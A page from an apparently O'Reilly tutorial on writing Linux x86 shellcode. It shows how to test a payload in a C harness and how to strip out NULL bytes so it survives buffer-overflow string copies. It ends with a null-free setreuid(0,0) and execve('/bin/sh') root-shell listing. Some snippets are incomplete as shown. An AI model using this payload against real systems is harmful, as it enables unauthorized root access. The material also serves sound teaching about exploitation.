oreilly.comSafari Books Online.Conferences.


How Shellcodes Work
Pages: 1, 2, 3, 4

Works Now

Compile the program with nasm:

$ nasm shell.asm

And dump its code with hexdump:

$ hexdump -C shell

Figure 1 shows a typical shellcode. The next step is to convert it into a better format by preceding each byte with \x, and then putting all of the code into a byte array. Now check that it works:

char code[]=

main() {
    int (*shell)();
    (int)shell = code;

Try to compile and run it:

$ gcc -o shellApp
$ ./shellApp

It works!

Not Yet Working: Eliminating NULL Bytes

Now the shellcode does not use the data segment and even works inside of a C tester program, but it still will not work inside a real exploit. The reason are the numerous NULL bytes (\x00). Most buffer overflow errors are related to C stdlib string functions: strcpy(), sprintf(), strcat(), and so on. All of these functions use the NULL symbol to indicate the end of a string. Therefore, a function will not read shellcode after the first occurring NULL byte.

Thus, the next task is to get rid of all null bytes in the shellcode. The idea is simple: find pieces of code that cause null bytes to appear and change them. A mature developer, in most cases, can say why machine code contains zeroes, but it's easy to use a disassembler to identify such instructions:

$ nasm shell.asm
$ ndisasm -b32 shell
00000000  B846000000        mov eax,0x46
00000005  BB00000000        mov ebx,0x0
0000000A  B900000000        mov ecx,0x0
0000000F  CD80              int 0x80

Executing this command will give the disassembled code of a program. It will contain three columns. The first column contains the instruction's address in hexadecimal form. It is not very important. The second column contains machine instructions, the same as shown with hexdump. The third column contains an assembly equivalent. This column will give you an idea which instructions contain null bytes in a shellcode.

After a brief review of a dump contents, it becomes evident that most null bytes come from instructions that manage the contents of registers and the stack. This is no surprise; this code works in a 32-bit mode, so the computer allocates a four-byte memory space for each numeric value. Yet the code uses only values for which one byte is enough. For example, the beginning of the program has the instruction mov eax, 70 to put the value 70 into the EAX register. In the shellcode, this instruction looks like B8 46 00 00 00. B8 is the machine code of the instruction mov ax, and 46 00 00 00 is the value 70 in hexadecimal notation, padded with zeroes to the size of four bytes. Many null bytes appear for similar reasons.

The solution for this problem is very simple. It's enough to remember that 32-bit registers (EAX, EBX, and other registers whose names begin with "E," for "enhanced") can be represented by 8-bit and 16-bit registers. It's enough to use a 16-bit register AX instead and even its low and high parts, AL and AH, which are one-byte registers. Just replace the instruction mov eax, 70 with mov al, 70 in all such places.

It's important to be sure that the rest of the EAX register space does not contain any garbage; that is, the code must put a zero value into EAX without using any null bytes. The fastest and most effective way of doing this is with the XOR logical function: xor eax,eax will give the EAX register a zero value.

Even after these modifications, the shellcode still contains zero bytes. The debugger shows that now the jmp instruction causes trouble:

E91500 jmp 0x29 0000 add [bx+si],al

The trick is to use a short jump instruction instead of the usual jmp short. In short programs with simple structure these instructions work in absolutely the same way, and the machine code in this case will not contain zero bytes.

You may now think that this shellcode is ideal, but at the end there is still one remaining zero byte. This zero byte occurs because the string bin/sh has a null byte indicating the end of the string. This is a definite requirement, because otherwise execve() will not work properly. You cannot just remove this byte. You can use one more assembler trick: at the compiling and binding stage, store any other symbol instead of zero, and convert it into zero while processing the program:

jmp short stuff 

pop esi
; address of string
; now in ESI

xor eax,eax
; put zero into EAX

mov byte [esi + 17],al
; count 18 symbols (index starts from zero)
; and putting a zero value there (EAX register equals to zero)
; The string will become This is my string0

call code

db 'This is my string#'

After using this trick, the shellcode will contain no null bytes:


;setreuid(0, 0)
xor eax,eax
mov al, 70
xor ebx,ebx
xor ecx,ecx
int 0x80

jmp short two

pop ebx

; execve("/bin/sh",["/bin/sh", NULL], NULL)
xor eax,eax
mov byte [ebx+7], al
push eax
push ebx
mov ecx, esp
mov al,11
xor edx,edx
int 0x80

call one
db '/bin/sh#'

After compiling this code, you can now see that it no longer contains null bytes. It's worth mentioning that the problem may arise not only because of null bytes, but because of other special symbols; for example, the end-of-line symbols, in some cases.

Pages: 1, 2, 3, 4

Next Pagearrow

Linux Online Certification

Linux/Unix System Administration Certificate Series
Linux/Unix System Administration Certificate Series — This course series targets both beginning and intermediate Linux/Unix users who want to acquire advanced system administration skills, and to back those skills up with a Certificate from the University of Illinois Office of Continuing Education.

Enroll today!

Linux Resources
  • Linux Online
  • The Linux FAQ
  • Linux Kernel Archives
  • Kernel Traffic

  • Sponsored by: